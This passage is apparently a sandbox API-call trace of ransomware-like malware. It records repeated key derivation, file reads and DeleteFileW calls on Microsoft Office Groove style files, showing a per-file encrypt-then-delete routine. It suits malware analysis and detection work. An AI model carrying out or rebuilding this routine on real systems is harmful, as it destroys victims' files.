(hHash=0x284d668) returned 1 [0169.196] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.196] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.197] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GreenTea.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\greentea.css")) returned 1 [0169.243] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.244] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.244] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.244] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.244] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7cf [0169.244] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.256] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0169.256] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.256] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.258] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\LightSpirit.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lightspirit.css")) returned 1 [0169.299] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0169.299] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.300] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.300] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.300] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.300] GetFileSize (in: hFile=0x518, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1091 [0169.300] ReadFile (in: hFile=0x518, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.308] CryptDestroyHash (hHash=0x284d668) returned 1 [0169.308] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.308] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.310] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lime.css")) returned 1 [0169.311] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.312] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.312] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.312] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.312] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x720 [0169.312] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.324] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0169.324] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.324] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.326] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Maroon.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\maroon.css")) returned 1 [0169.328] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0169.329] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.329] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.329] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.329] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.329] GetFileSize (in: hFile=0x518, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfb0 [0169.330] ReadFile (in: hFile=0x518, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.344] CryptDestroyHash (hHash=0x284d668) returned 1 [0169.344] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.344] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.346] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis.css")) returned 1 [0169.349] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.350] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.350] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.350] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.350] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x74b [0169.350] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.365] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0169.365] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.365] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.366] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\OliveGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\olivegreen.css")) returned 1 [0169.369] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.369] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.369] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.369] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.369] GetFileSize (in: hFile=0x518, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x706 [0169.370] ReadFile (in: hFile=0x518, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.394] CryptDestroyHash (hHash=0x284d668) returned 1 [0169.394] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.394] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.396] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Premium.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\premium.css")) returned 1 [0169.397] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0169.398] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.399] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.399] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.399] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.399] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10d7 [0169.399] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.406] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0169.406] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.406] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.407] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate.css")) returned 1 [0169.409] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.410] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.410] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.410] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0169.410] GetFileSize (in: hFile=0x518, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x74a [0169.410] ReadFile (in: hFile=0x518, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.436] CryptDestroyHash (hHash=0x284d668) returned 1 [0169.436] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0169.436] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.438] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SlateBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slateblue.css")) returned 1 [0169.439] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0169.440] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0169.441] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0169.441] CryptHashData (hHash=0x284d6a8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.441] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d668) returned 1 [0169.441] GetFileSize (in: hFile=0x518, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1afa [0169.441] ReadFile (in: hFile=0x518, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0169.700] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0169.700] CryptDestroyKey (hKey=0x284d668) returned 1 [0169.700] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.754] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\background.gif")) returned 1 [0169.757] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.758] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.758] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.758] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0169.758] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11ca [0169.758] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.781] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0169.781] CryptDestroyKey (hKey=0x284d628) returned 1 [0169.781] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.783] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue.css")) returned 1 [0169.904] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0169.905] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.906] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.906] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.906] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0169.906] GetFileSize (in: hFile=0x520, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfd0 [0169.906] ReadFile (in: hFile=0x520, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0169.964] CryptDestroyHash (hHash=0x284d668) returned 1 [0169.964] CryptDestroyKey (hKey=0x284d628) returned 1 [0169.964] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0169.966] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen.css")) returned 1 [0169.978] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0169.978] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0169.978] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.978] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0169.978] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xadd [0169.978] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0170.004] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0170.005] CryptDestroyKey (hKey=0x284d628) returned 1 [0170.005] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.007] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Sts.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts.css")) returned 1 [0170.008] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0170.138] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0170.139] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0170.139] CryptHashData (hHash=0x284d628, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.139] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0170.139] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe9 [0170.139] ReadFile (in: hFile=0x4e8, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0170.141] CryptDestroyHash (hHash=0x284d628) returned 1 [0170.141] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0170.141] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.142] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts2\\background.gif")) returned 1 [0170.144] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0170.145] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0170.145] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.145] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0170.145] GetFileSize (in: hFile=0x520, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x107e [0170.145] ReadFile (in: hFile=0x520, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0170.168] CryptDestroyHash (hHash=0x284d668) returned 1 [0170.168] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0170.168] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.169] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Sts2.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts2.css")) returned 1 [0170.172] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0170.174] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0170.175] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0170.175] CryptHashData (hHash=0x284d6a8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.175] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d668) returned 1 [0170.175] GetFileSize (in: hFile=0x520, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x32f [0170.175] ReadFile (in: hFile=0x520, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0170.178] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0170.178] CryptDestroyKey (hKey=0x284d668) returned 1 [0170.178] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.179] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\swirl\\background.gif")) returned 1 [0170.181] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0170.182] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0170.182] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.182] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0170.182] GetFileSize (in: hFile=0x528, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfb9 [0170.182] ReadFile (in: hFile=0x528, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0170.197] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0170.197] CryptDestroyKey (hKey=0x284d628) returned 1 [0170.197] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.199] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\swirl.css")) returned 1 [0170.200] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0170.201] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0170.201] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.201] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d628) returned 1 [0170.201] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x738 [0170.201] ReadFile (in: hFile=0x4e8, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0170.207] CryptDestroyHash (hHash=0x284d668) returned 1 [0170.207] CryptDestroyKey (hKey=0x284d628) returned 1 [0170.207] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0170.208] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Teal.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\teal.css")) returned 1 [0170.210] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0170.210] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0170.211] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.211] CryptDeriveKey (in: hProv=0xa52810, 